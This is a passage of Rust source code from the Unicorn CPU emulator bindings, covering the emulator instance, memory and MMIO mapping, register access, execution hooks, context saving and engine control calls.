crate::mips::*; // include ppc support if conditionally compiled in #[cfg(feature = "arch_ppc")] mod ppc; #[cfg(feature = "arch_ppc")] pub use crate::ppc::*; // include riscv support if conditionally compiled in #[cfg(feature = "arch_riscv")] mod riscv; #[cfg(feature = "arch_riscv")] pub use crate::riscv::*; // include s390x support if conditionally compiled in #[cfg(feature = "arch_s390x")] mod s390x; #[cfg(feature = "arch_s390x")] pub use crate::s390x::*; // include sparc support if conditionally compiled in #[cfg(feature = "arch_sparc")] mod sparc; #[cfg(feature = "arch_sparc")] pub use crate::sparc::*; // include tricore support if conditionally compiled in #[cfg(feature = "arch_tricore")] mod tricore; #[cfg(feature = "arch_tricore")] pub use crate::tricore::*; // include x86 support if conditionally compiled in #[cfg(feature = "arch_x86")] mod x86; #[cfg(feature = "arch_x86")] pub use crate::x86::*; #[derive(Debug)] pub struct Context { context: ffi::uc_context, } impl Context { #[must_use] pub fn is_initialized(&self) -> bool { !self.context.is_null() } } impl Drop for Context { fn drop(&mut self) { if self.is_initialized() { unsafe { ffi::uc_context_free(self.context); } } self.context = ptr::null_mut(); } } pub struct MmioCallbackScope<'a> { pub regions: Vec<(u64, usize)>, pub read_callback: Option<Box<dyn ffi::IsUcHook<'a> + 'a>>, pub write_callback: Option<Box<dyn ffi::IsUcHook<'a> + 'a>>, } impl<'a> MmioCallbackScope<'a> { fn has_regions(&self) -> bool { !self.regions.is_empty() } fn unmap(&mut self, begin: u64, size: usize) { let end: u64 = begin + size as u64; self.regions = self .regions .iter() .flat_map(|(b, s)| { let e: u64 = b + *s as u64; if begin > *b { if begin >= e { // The unmapped region is completely after this region vec![(*b, *s)] } else if end >= e { // The unmapped region overlaps with the end of this region vec![(*b, (begin - *b) as usize)] } else { // The unmapped region is in the middle of this region let second_b = end + 1; vec![ (*b, (begin - *b) as usize), (second_b, (e - second_b) as usize), ] } } else if end > *b { if end >= e { // The unmapped region completely contains this region vec![] } else { // The unmapped region overlaps with the start of this region vec![(end, (e - end) as usize)] } } else { // The unmapped region is completely before this region vec![(*b, *s)] } }) .collect(); } } #[derive(Clone, Copy, PartialEq, Eq, Debug)] pub struct UcHookId(ffi::uc_hook); pub struct UnicornInner<'a, D> { pub handle: uc_handle, pub ffi: bool, pub arch: Arch, /// to keep ownership over 
the hook for this uc instance's lifetime pub hooks: Vec<(UcHookId, Box<dyn ffi::IsUcHook<'a> + 'a>)>, /// To keep ownership over the mmio callbacks for this uc instance's lifetime pub mmio_callbacks: Vec<MmioCallbackScope<'a>>, pub data: D, } /// Drop UC impl<'a, D> Drop for UnicornInner<'a, D> { fn drop(&mut self) { if !self.ffi && !self.handle.is_null() { unsafe { ffi::uc_close(self.handle) }; } self.handle = ptr::null_mut(); } } /// A Unicorn emulator instance. pub struct Unicorn<'a, D: 'a> { inner: Rc<UnsafeCell<UnicornInner<'a, D>>>, } impl<'a> Unicorn<'a, ()> { /// Create a new instance of the unicorn engine for the specified architecture /// and hardware mode. pub fn new(arch: Arch, mode: Mode) -> Result<Unicorn<'a, ()>, uc_error> { Self::new_with_data(arch, mode, ()) } /// # Safety /// The function has to be called with a valid uc_handle pointer /// that was previously allocated by a call to uc_open. /// Calling the function with a non null pointer value that /// does not point to a unicorn instance will cause undefined /// behavior. pub unsafe fn from_handle(handle: uc_handle) -> Result<Unicorn<'a, ()>, uc_error> { if handle.is_null() { return Err(uc_error::HANDLE); } let mut arch: libc::size_t = Default::default(); let err = unsafe { ffi::uc_query(handle, Query::ARCH, &mut arch) }; if err != uc_error::OK { return Err(err); } Ok(Unicorn { inner: Rc::new(UnsafeCell::from(UnicornInner { handle, ffi: true, arch: arch.try_into()?, data: (), hooks: vec![], mmio_callbacks: vec![], })), }) } } impl<'a, D> Unicorn<'a, D> where D: 'a, { /// Create a new instance of the unicorn engine for the specified architecture /// and hardware mode. pub fn new_with_data(arch: Arch, mode: Mode, data: D) -> Result<Unicorn<'a, D>, uc_error> { let mut handle = ptr::null_mut(); unsafe { ffi::uc_open(arch, mode, &mut handle) }.and_then(|| { Ok(Unicorn { inner: Rc::new(UnsafeCell::from(UnicornInner { handle, ffi: false, arch, data, hooks: vec![], mmio_callbacks: vec![], })), }) }) } } impl<'a, D> core::fmt::Debug for Unicorn<'a, D> { fn fmt(&self, formatter: &mut core::fmt::Formatter) -> core::fmt::Result { write!(formatter, "Unicorn {{ uc: {:p} }}", self.get_handle()) } } impl<'a, D> Unicorn<'a, D> { fn inner(&self) -> &UnicornInner<'a, D> { unsafe { self.inner.get().as_ref().unwrap() } } fn inner_mut(&mut self) -> &mut UnicornInner<'a, D> { unsafe { self.inner.get().as_mut().unwrap() } } /// Return whatever data was passed during initialization. /// /// For an example, have a look at `utils::init_emu_with_heap` where /// a struct is passed which is used for a custom allocator. #[must_use] pub fn get_data(&self) -> &D { &self.inner().data } /// Return a mutable reference to whatever data was passed during initialization. #[must_use] pub fn get_data_mut(&mut self) -> &mut D { &mut self.inner_mut().data } /// Return the architecture of the current emulator. #[must_use] pub fn get_arch(&self) -> Arch { self.inner().arch } /// Return the handle of the current emulator. #[must_use] pub fn get_handle(&self) -> uc_handle { self.inner().handle } /// Returns a vector with the memory regions that are mapped in the emulator. 
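    ///
    /// A hedged usage sketch (editor's addition), assuming `MemRegion` exposes
    /// `begin`, `end` and `perms` fields as defined in `unicorn_const`:
    ///
    /// ```rust,ignore
    /// for region in emu.mem_regions()? {
    ///     println!("{:#x}-{:#x} {:?}", region.begin, region.end, region.perms);
    /// }
    /// ```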
    pub fn mem_regions(&self) -> Result<Vec<MemRegion>, uc_error> {
        let mut nb_regions: u32 = 0;
        let p_regions: *const MemRegion = ptr::null_mut();
        unsafe { ffi::uc_mem_regions(self.get_handle(), &p_regions, &mut nb_regions) }.and_then(
            || {
                let mut regions = Vec::new();
                for i in 0..nb_regions {
                    regions.push(unsafe { core::mem::transmute_copy(&*p_regions.add(i as usize)) });
                }
                unsafe { libc::free(p_regions as _) };
                Ok(regions)
            },
        )
    }

    /// Read a range of bytes from memory at the specified emulated physical address.
    pub fn mem_read(&self, address: u64, buf: &mut [u8]) -> Result<(), uc_error> {
        unsafe { ffi::uc_mem_read(self.get_handle(), address, buf.as_mut_ptr(), buf.len()) }.into()
    }

    /// Return a range of bytes from memory at the specified emulated physical address as a vector.
    pub fn mem_read_as_vec(&self, address: u64, size: usize) -> Result<Vec<u8>, uc_error> {
        let mut buf = vec![0; size];
        unsafe { ffi::uc_mem_read(self.get_handle(), address, buf.as_mut_ptr(), size) }.and(Ok(buf))
    }

    /// Write the data in `bytes` to the emulated physical address `address`.
    pub fn mem_write(&mut self, address: u64, bytes: &[u8]) -> Result<(), uc_error> {
        unsafe { ffi::uc_mem_write(self.get_handle(), address, bytes.as_ptr(), bytes.len()) }.into()
    }

    /// Map an existing memory region in the emulator at the specified address.
    ///
    /// # Safety
    ///
    /// This function is marked unsafe because it is the responsibility of the caller to
    /// ensure that `size` matches the size of the passed buffer; an invalid `size` value will
    /// likely cause a crash in unicorn.
    ///
    /// `address` must be aligned to 4kb or this will return `Error::ARG`.
    ///
    /// `size` must be a multiple of 4kb or this will return `Error::ARG`.
    ///
    /// `ptr` is a pointer to the provided memory region that will be used by the emulator.
    pub unsafe fn mem_map_ptr(
        &mut self,
        address: u64,
        size: usize,
        perms: Permission,
        ptr: *mut c_void,
    ) -> Result<(), uc_error> {
        ffi::uc_mem_map_ptr(self.get_handle(), address, size, perms.bits(), ptr).into()
    }

    /// Map a memory region in the emulator at the specified address.
    ///
    /// `address` must be aligned to 4kb or this will return `Error::ARG`.
    /// `size` must be a multiple of 4kb or this will return `Error::ARG`.
    pub fn mem_map(
        &mut self,
        address: u64,
        size: libc::size_t,
        perms: Permission,
    ) -> Result<(), uc_error> {
        unsafe { ffi::uc_mem_map(self.get_handle(), address, size, perms.bits()) }.into()
    }

    /// Map in an MMIO region backed by callbacks.
    ///
    /// `address` must be aligned to 4kb or this will return `Error::ARG`.
    /// `size` must be a multiple of 4kb or this will return `Error::ARG`.
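    ///
    /// A minimal sketch (editor's addition): a device that reads as zero and
    /// ignores writes, with closure shapes matching the `R`/`W` bounds below:
    ///
    /// ```rust,ignore
    /// emu.mmio_map(
    ///     0x4000_0000,
    ///     0x1000,
    ///     Some(|_uc: &mut Unicorn<()>, _offset, _size| 0u64), // read callback
    ///     Some(|_uc: &mut Unicorn<()>, _offset, _size, _value| {}), // write callback
    /// )?;
    /// ```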
    pub fn mmio_map<R: 'a, W: 'a>(
        &mut self,
        address: u64,
        size: libc::size_t,
        read_callback: Option<R>,
        write_callback: Option<W>,
    ) -> Result<(), uc_error>
    where
        R: FnMut(&mut Unicorn<D>, u64, usize) -> u64,
        W: FnMut(&mut Unicorn<D>, u64, usize, u64),
    {
        let mut read_data = read_callback.map(|c| {
            Box::new(ffi::UcHook {
                callback: c,
                uc: Rc::downgrade(&self.inner),
            })
        });
        let mut write_data = write_callback.map(|c| {
            Box::new(ffi::UcHook {
                callback: c,
                uc: Rc::downgrade(&self.inner),
            })
        });

        unsafe {
            ffi::uc_mmio_map(
                self.get_handle(),
                address,
                size,
                match read_data {
                    Some(_) => ffi::mmio_read_callback_proxy::<D, R> as _,
                    None => ptr::null_mut(),
                },
                match read_data {
                    Some(ref mut d) => d.as_mut() as *mut _ as _,
                    None => ptr::null_mut(),
                },
                match write_data {
                    Some(_) => ffi::mmio_write_callback_proxy::<D, W> as _,
                    None => ptr::null_mut(),
                },
                match write_data {
                    Some(ref mut d) => d.as_mut() as *mut _ as _,
                    None => ptr::null_mut(),
                },
            )
        }
        .and_then(|| {
            let rd = read_data.map(|c| c as Box<dyn ffi::IsUcHook>);
            let wd = write_data.map(|c| c as Box<dyn ffi::IsUcHook>);
            self.inner_mut().mmio_callbacks.push(MmioCallbackScope {
                regions: vec![(address, size)],
                read_callback: rd,
                write_callback: wd,
            });
            Ok(())
        })
    }

    /// Map in a read-only MMIO region backed by a callback.
    ///
    /// `address` must be aligned to 4kb or this will return `Error::ARG`.
    /// `size` must be a multiple of 4kb or this will return `Error::ARG`.
    pub fn mmio_map_ro<F: 'a>(
        &mut self,
        address: u64,
        size: libc::size_t,
        callback: F,
    ) -> Result<(), uc_error>
    where
        F: FnMut(&mut Unicorn<D>, u64, usize) -> u64,
    {
        self.mmio_map(
            address,
            size,
            Some(callback),
            None::<fn(&mut Unicorn<D>, u64, usize, u64)>,
        )
    }

    /// Map in a write-only MMIO region backed by a callback.
    ///
    /// `address` must be aligned to 4kb or this will return `Error::ARG`.
    /// `size` must be a multiple of 4kb or this will return `Error::ARG`.
    pub fn mmio_map_wo<F: 'a>(
        &mut self,
        address: u64,
        size: libc::size_t,
        callback: F,
    ) -> Result<(), uc_error>
    where
        F: FnMut(&mut Unicorn<D>, u64, usize, u64),
    {
        self.mmio_map(
            address,
            size,
            None::<fn(&mut Unicorn<D>, u64, usize) -> u64>,
            Some(callback),
        )
    }

    /// Unmap a memory region.
    ///
    /// `address` must be aligned to 4kb or this will return `Error::ARG`.
    /// `size` must be a multiple of 4kb or this will return `Error::ARG`.
    pub fn mem_unmap(&mut self, address: u64, size: libc::size_t) -> Result<(), uc_error> {
        let err = unsafe { ffi::uc_mem_unmap(self.get_handle(), address, size) };
        self.mmio_unmap(address, size);
        err.into()
    }

    fn mmio_unmap(&mut self, address: u64, size: libc::size_t) {
        for scope in self.inner_mut().mmio_callbacks.iter_mut() {
            scope.unmap(address, size);
        }
        self.inner_mut()
            .mmio_callbacks
            .retain(|scope| scope.has_regions());
    }

    /// Set the memory permissions for an existing memory region.
    ///
    /// `address` must be aligned to 4kb or this will return `Error::ARG`.
    /// `size` must be a multiple of 4kb or this will return `Error::ARG`.
    pub fn mem_protect(
        &mut self,
        address: u64,
        size: libc::size_t,
        perms: Permission,
    ) -> Result<(), uc_error> {
        unsafe { ffi::uc_mem_protect(self.get_handle(), address, size, perms.bits()) }.into()
    }

    /// Write an unsigned value to a register.
    pub fn reg_write<T: Into<i32>>(&mut self, regid: T, value: u64) -> Result<(), uc_error> {
        unsafe { ffi::uc_reg_write(self.get_handle(), regid.into(), &value as *const _ as _) }
            .into()
    }

    /// Write variable-sized values into registers.
    ///
    /// The user has to make sure that the buffer length matches the register size.
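    /// For example (a hedged sketch), x86 `XMM0` is 128 bits wide, so it takes
    /// a 16-byte buffer: `emu.reg_write_long(RegisterX86::XMM0, &[0u8; 16])`.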
    /// This adds support for registers >64 bit (GDTR/IDTR, XMM, YMM, ZMM (x86); Q, V (arm64)).
    pub fn reg_write_long<T: Into<i32>>(&self, regid: T, value: &[u8]) -> Result<(), uc_error> {
        unsafe { ffi::uc_reg_write(self.get_handle(), regid.into(), value.as_ptr() as _) }.into()
    }

    /// Read an unsigned value from a register.
    ///
    /// Not to be used with registers larger than 64 bit.
    pub fn reg_read<T: Into<i32>>(&self, regid: T) -> Result<u64, uc_error> {
        let mut value: u64 = 0;
        unsafe { ffi::uc_reg_read(self.get_handle(), regid.into(), &mut value as *mut u64 as _) }
            .and(Ok(value))
    }

    /// Read an 80, 128, 256 or 512 bit register value into a heap-allocated byte array.
    ///
    /// This adds safe support for registers >64 bit (GDTR/IDTR, XMM, YMM, ZMM, ST (x86); Q, V (arm64)).
    pub fn reg_read_long<T: Into<i32>>(&self, regid: T) -> Result<Box<[u8]>, uc_error> {
        let curr_reg_id = regid.into();
        let curr_arch = self.get_arch();

        let value_size = match curr_arch {
            #[cfg(feature = "arch_x86")]
            Arch::X86 => Self::value_size_x86(curr_reg_id)?,
            #[cfg(feature = "arch_arm")]
            Arch::ARM64 => Self::value_size_arm64(curr_reg_id)?,
            _ => Err(uc_error::ARCH)?,
        };
        let mut value = vec![0; value_size];
        unsafe { ffi::uc_reg_read(self.get_handle(), curr_reg_id, value.as_mut_ptr() as _) }
            .and_then(|| Ok(value.into_boxed_slice()))
    }

    #[cfg(feature = "arch_arm")]
    fn value_size_arm64(curr_reg_id: i32) -> Result<usize, uc_error> {
        match curr_reg_id {
            r if (RegisterARM64::Q0 as i32..=RegisterARM64::Q31 as i32).contains(&r)
                || (RegisterARM64::V0 as i32..=RegisterARM64::V31 as i32).contains(&r) =>
            {
                Ok(16)
            }
            _ => Err(uc_error::ARG),
        }
    }

    #[cfg(feature = "arch_x86")]
    fn value_size_x86(curr_reg_id: i32) -> Result<usize, uc_error> {
        match curr_reg_id {
            r if (RegisterX86::XMM0 as i32..=RegisterX86::XMM31 as i32).contains(&r) => Ok(16),
            r if (RegisterX86::YMM0 as i32..=RegisterX86::YMM31 as i32).contains(&r) => Ok(32),
            r if (RegisterX86::ZMM0 as i32..=RegisterX86::ZMM31 as i32).contains(&r) => Ok(64),
            r if r == RegisterX86::GDTR as i32
                || r == RegisterX86::IDTR as i32
                || (RegisterX86::ST0 as i32..=RegisterX86::ST7 as i32).contains(&r) =>
            {
                Ok(10)
            }
            _ => Err(uc_error::ARG),
        }
    }

    /// Read a signed 32-bit value from a register.
    pub fn reg_read_i32<T: Into<i32>>(&self, regid: T) -> Result<i32, uc_error> {
        let mut value: i32 = 0;
        unsafe { ffi::uc_reg_read(self.get_handle(), regid.into(), &mut value as *mut i32 as _) }
            .and(Ok(value))
    }

    /// Add a code hook.
    pub fn add_code_hook<F: 'a>(
        &mut self,
        begin: u64,
        end: u64,
        callback: F,
    ) -> Result<UcHookId, uc_error>
    where
        F: FnMut(&mut Unicorn<D>, u64, u32) + 'a,
    {
        let mut hook_id = ptr::null_mut();
        let mut user_data = Box::new(ffi::UcHook {
            callback,
            uc: Rc::downgrade(&self.inner),
        });

        unsafe {
            ffi::uc_hook_add(
                self.get_handle(),
                &mut hook_id,
                HookType::CODE,
                ffi::code_hook_proxy::<D, F> as _,
                user_data.as_mut() as *mut _ as _,
                begin,
                end,
            )
        }
        .and_then(|| {
            let hook_id = UcHookId(hook_id);
            self.inner_mut().hooks.push((hook_id, user_data));
            Ok(hook_id)
        })
    }

    /// Add a block hook.
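    ///
    /// A usage sketch (added for illustration; not from the original source —
    /// crate import paths are assumed). The callback receives the block's
    /// start address and size, per the `F` bound below:
    ///
    /// ```no_run
    /// use unicorn_engine::Unicorn;
    /// use unicorn_engine::unicorn_const::{Arch, Mode};
    ///
    /// let mut uc = Unicorn::new(Arch::X86, Mode::MODE_32).unwrap();
    /// // Log every translated basic block in the whole address space.
    /// let hook_id = uc
    ///     .add_block_hook(0, u64::MAX, |_uc, address, size| {
    ///         println!("block at {address:#x} ({size} bytes)");
    ///     })
    ///     .unwrap();
    /// uc.remove_hook(hook_id).unwrap();
    /// ```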
pub fn add_block_hook<F: 'a>( &mut self, begin: u64, end: u64, callback: F, ) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>, u64, u32), { let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, HookType::BLOCK, ffi::block_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, begin, end, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } /// Add a memory hook. pub fn add_mem_hook<F: 'a>( &mut self, hook_type: HookType, begin: u64, end: u64, callback: F, ) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>, MemType, u64, usize, i64) -> bool, { if !(HookType::MEM_ALL | HookType::MEM_READ_AFTER).contains(hook_type) { return Err(uc_error::ARG); } let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, hook_type, ffi::mem_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, begin, end, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } /// Add an interrupt hook. pub fn add_intr_hook<F: 'a>(&mut self, callback: F) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>, u32), { let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, HookType::INTR, ffi::intr_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, 0, 0, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } /// Add hook for invalid instructions pub fn add_insn_invalid_hook<F: 'a>(&mut self, callback: F) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>) -> bool, { let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, HookType::INSN_INVALID, ffi::insn_invalid_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, 0, 0, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } /// Add hook for x86 IN instruction. #[cfg(feature = "arch_x86")] pub fn add_insn_in_hook<F: 'a>(&mut self, callback: F) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>, u32, usize) -> u32, { let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, HookType::INSN, ffi::insn_in_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, 0, 0, InsnX86::IN, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } /// Add hook for x86 OUT instruction. 
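    ///
    /// Sketch (added; illustrative only — import paths are assumed). Per the
    /// callback bound below, the closure receives the port, access size and
    /// value being written:
    ///
    /// ```no_run
    /// use unicorn_engine::Unicorn;
    /// use unicorn_engine::unicorn_const::{Arch, Mode};
    ///
    /// let mut uc = Unicorn::new(Arch::X86, Mode::MODE_32).unwrap();
    /// uc.add_insn_out_hook(|_uc, port, size, value| {
    ///     println!("OUT port={port:#x} size={size} value={value:#x}");
    /// })
    /// .unwrap();
    /// ```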
#[cfg(feature = "arch_x86")] pub fn add_insn_out_hook<F: 'a>(&mut self, callback: F) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>, u32, usize, u32), { let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, HookType::INSN, ffi::insn_out_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, 0, 0, InsnX86::OUT, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } /// Add hook for x86 SYSCALL or SYSENTER. #[cfg(feature = "arch_x86")] pub fn add_insn_sys_hook<F>( &mut self, insn_type: InsnSysX86, begin: u64, end: u64, callback: F, ) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>) + 'a, { let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, HookType::INSN, ffi::insn_sys_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, begin, end, insn_type, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } pub fn add_tlb_hook<F>( &mut self, begin: u64, end: u64, callback: F, ) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>, u64, MemType) -> Option<TlbEntry> + 'a, { let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, HookType::TLB, ffi::tlb_lookup_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, begin, end, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } /// Remove a hook. /// /// `hook_id` is the value returned by `add_*_hook` functions. pub fn remove_hook(&mut self, hook_id: UcHookId) -> Result<(), uc_error> { // drop the hook let inner = self.inner_mut(); inner.hooks.retain(|(id, _)| id != &hook_id); unsafe { ffi::uc_hook_del(inner.handle, hook_id.0) }.into() } /// Allocate and return an empty Unicorn context. /// /// To be populated via `context_save`. pub fn context_alloc(&self) -> Result<Context, uc_error> { let mut empty_context: ffi::uc_context = ptr::null_mut(); unsafe { ffi::uc_context_alloc(self.get_handle(), &mut empty_context) }.and(Ok(Context { context: empty_context, })) } /// Save current Unicorn context to previously allocated Context struct. pub fn context_save(&self, context: &mut Context) -> Result<(), uc_error> { unsafe { ffi::uc_context_save(self.get_handle(), context.context) }.into() } /// Allocate and return a Context struct initialized with the current CPU context. /// /// This can be used for fast rollbacks with `context_restore`. /// In case of many non-concurrent context saves, use `context_alloc` and *_save /// individually to avoid unnecessary allocations. pub fn context_init(&self) -> Result<Context, uc_error> { let mut new_context: ffi::uc_context = ptr::null_mut(); unsafe { ffi::uc_context_alloc(self.get_handle(), &mut new_context).and_then(|| { ffi::uc_context_save(self.get_handle(), new_context) .and(Ok(Context { context: new_context, })) .map_err(|e| { ffi::uc_context_free(new_context); e }) }) } } /// Restore a previously saved Unicorn context. /// /// Perform a quick rollback of the CPU context, including registers and some /// internal metadata. 
Contexts may not be shared across engine instances with
    /// differing arches or modes. Memory has to be restored manually, if needed.
    pub fn context_restore(&self, context: &Context) -> Result<(), uc_error> {
        unsafe { ffi::uc_context_restore(self.get_handle(), context.context) }.into()
    }

    /// Emulate machine code for a specified duration.
    ///
    /// `begin` is the address at which to start the emulation. The emulation stops if `until`
    /// is hit. `timeout` specifies a duration in microseconds after which the emulation is
    /// stopped (infinite execution if set to 0). `count` is the maximum number of instructions
    /// to emulate (emulate all the available instructions if set to 0).
    pub fn emu_start(
        &mut self,
        begin: u64,
        until: u64,
        timeout: u64,
        count: usize,
    ) -> Result<(), uc_error> {
        unsafe { ffi::uc_emu_start(self.get_handle(), begin, until, timeout, count as _) }.into()
    }

    /// Stop the emulation.
    ///
    /// This is usually called from a callback function in hooks.
    /// NOTE: For now, this will stop the execution only after the current block.
    pub fn emu_stop(&mut self) -> Result<(), uc_error> {
        unsafe { ffi::uc_emu_stop(self.get_handle()).into() }
    }

    /// Query the internal status of the engine.
    ///
    /// Supported: `MODE`, `PAGE_SIZE`, `ARCH`
    pub fn query(&self, query: Query) -> Result<usize, uc_error> {
        let mut result: libc::size_t = Default::default();
        unsafe { ffi::uc_query(self.get_handle(), query, &mut result) }.and(Ok(result))
    }

    /// Get the `i32` register value for the program counter for the specified architecture.
    ///
    /// If an architecture is not compiled in, this function will return `uc_error::ARCH`.
    #[inline]
    fn arch_to_pc_register(arch: Arch) -> Result<i32, uc_error> {
        match arch {
            #[cfg(feature = "arch_x86")]
            Arch::X86 => Ok(RegisterX86::RIP as i32),
            #[cfg(feature = "arch_arm")]
            Arch::ARM => Ok(RegisterARM::PC as i32),
            #[cfg(feature = "arch_arm")]
            Arch::ARM64 => Ok(RegisterARM64::PC as i32),
            #[cfg(feature = "arch_mips")]
            Arch::MIPS => Ok(RegisterMIPS::PC as i32),
            #[cfg(feature = "arch_sparc")]
            Arch::SPARC => Ok(RegisterSPARC::PC as i32),
            #[cfg(feature = "arch_m68k")]
            Arch::M68K => Ok(RegisterM68K::PC as i32),
            #[cfg(feature = "arch_ppc")]
            Arch::PPC => Ok(RegisterPPC::PC as i32),
            #[cfg(feature = "arch_riscv")]
            Arch::RISCV => Ok(RegisterRISCV::PC as i32),
            #[cfg(feature = "arch_s390x")]
            Arch::S390X => Ok(RegisterS390X::PC as i32),
            #[cfg(feature = "arch_tricore")]
            Arch::TRICORE => Ok(RegisterTRICORE::PC as i32),
            // returns `uc_error::ARCH` for `Arch::MAX`, and any
            // other architectures that are not compiled in
            _ => Err(uc_error::ARCH),
        }
    }

    /// Gets the current program counter for this `unicorn` instance.
    #[inline]
    pub fn pc_read(&self) -> Result<u64, uc_error> {
        let arch = self.get_arch();
        self.reg_read(Self::arch_to_pc_register(arch)?)
    }

    /// Sets the program counter for this `unicorn` instance.
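    ///
    /// Sketch (added; illustrative only — import paths are assumed). `set_pc`
    /// and `pc_read` resolve the architecture's PC register internally, so the
    /// same code works across targets:
    ///
    /// ```no_run
    /// use unicorn_engine::Unicorn;
    /// use unicorn_engine::unicorn_const::{Arch, Mode};
    ///
    /// let mut uc = Unicorn::new(Arch::X86, Mode::MODE_64).unwrap();
    /// uc.set_pc(0x1000).unwrap();
    /// assert_eq!(uc.pc_read().unwrap(), 0x1000);
    /// ```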
#[inline] pub fn set_pc(&mut self, value: u64) -> Result<(), uc_error> { let arch = self.get_arch(); self.reg_write(Self::arch_to_pc_register(arch)?, value) } pub fn ctl_get_mode(&self) -> Result<Mode, uc_error> { let mut result: i32 = Default::default(); unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_READ!(ControlType::UC_CTL_UC_MODE), &mut result, ) } .and_then(|| Ok(Mode::from_bits_truncate(result))) } pub fn ctl_get_page_size(&self) -> Result<u32, uc_error> { let mut result: u32 = Default::default(); unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_READ!(ControlType::UC_CTL_UC_PAGE_SIZE), &mut result, ) } .and_then(|| Ok(result)) } pub fn ctl_set_page_size(&self, page_size: u32) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_UC_PAGE_SIZE), page_size, ) } .into() } pub fn ctl_get_arch(&self) -> Result<Arch, uc_error> { let mut result: i32 = Default::default(); unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_READ!(ControlType::UC_CTL_UC_ARCH), &mut result, ) } .and_then(|| Arch::try_from(result as usize)) } pub fn ctl_get_timeout(&self) -> Result<u64, uc_error> { let mut result: u64 = Default::default(); unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_READ!(ControlType::UC_CTL_UC_TIMEOUT), &mut result, ) } .and(Ok(result)) } pub fn ctl_exits_enable(&self) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_UC_USE_EXITS), 1, ) } .into() } pub fn ctl_exits_disable(&self) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_UC_USE_EXITS), 0, ) } .into() } pub fn ctl_get_exits_count(&self) -> Result<usize, uc_error> { let mut result: libc::size_t = 0usize; unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_READ!(ControlType::UC_CTL_UC_EXITS_CNT), &mut result, ) } .and(Ok(result)) } pub fn ctl_get_exits(&self) -> Result<Vec<u64>, uc_error> { let exits_count: libc::size_t = self.ctl_get_exits_count()?; let mut exits: Vec<u64> = Vec::with_capacity(exits_count); unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_READ!(ControlType::UC_CTL_UC_EXITS), exits.as_mut_ptr(), exits_count, ) } .and_then(|| unsafe { exits.set_len(exits_count); Ok(exits) }) } pub fn ctl_set_exits(&self, exits: &[u64]) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_UC_EXITS), exits.as_ptr(), exits.len() as libc::size_t, ) } .into() } pub fn ctl_get_cpu_model(&self) -> Result<i32, uc_error> { let mut result: i32 = Default::default(); unsafe { ffi::uc_ctl( self.get_handle(), 